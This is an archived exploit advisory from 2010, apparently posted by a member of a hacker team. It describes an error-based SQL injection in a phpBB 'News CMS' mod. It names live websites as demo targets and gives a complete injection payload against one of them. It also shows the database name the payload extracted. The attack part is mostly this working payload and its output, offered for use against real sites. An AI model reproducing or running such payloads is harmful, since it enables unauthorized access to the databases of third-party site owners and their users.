phpBB Modified By News CMS SQL Injection

2010-11-05T00:00:00
ID PACKETSTORM:95527
Type packetstorm
Reporter KnocKout
Modified 2010-11-05T00:00:00

Description

                                        
                                            `=============================================================  
phpBB Modified by (News CMS) <= Remote Based SQL Injection  
=============================================================  
  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : Inj3ct0r.com 0  
1 [+] Support e-mail : submit[at]inj3ct0r.com 1  
0 0  
1 ###################################### 1  
0 I'm KnocKout member from Inj3ct0r Team 1  
1 ###################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
[+] Author : KnocKout  
[~] Contact : knockoutr@msn.com  
[~] HomePage : http://h4x0resec.blogspot.com  
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
|~Web App. : phpBB MOD by (news CMS)  
|~Price : N/A  
|~Version : N/A  
|~Software: www.phpbb.com  
|~Vulnerability Style : SQL Injection  
|~Vulnerability Dir : /news/  
|~sqL : MySQL error based  
|~Google Keyword : N/A  
|[~]Date : "04.11.2010"  
|[~]Tested on : (L):Vista (R):Apache/2.2.9 (Debian) PHP/5.2.6-1 and Demos  
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Demos:   
http://www.travelguide-bg.com/news/  
http://www.eaglesflyinghigh.com/news/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
===============================================================  
|{~~~~~~~~ Explotation| MySQL error based SQL Injection~~~~~~~~~~~}|  
  
http://$Site/$path//news/news.php?id= {SQL Injection}  
  
Ex; http://www.travelguide-bg.com  
  
[~] SQL Injecting  
http://www.travelguide-bg.com/news/news.php?id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
[~] MSSQL Error : Duplicate entry '~'EFH_Production'~1' for key 1  
[+] DB Name : 'EFH_Production' [OK]  
  
To your Continue..  
  
http://inj3ct0r.com/exploits/14509  
  
..   
=============================================================  
`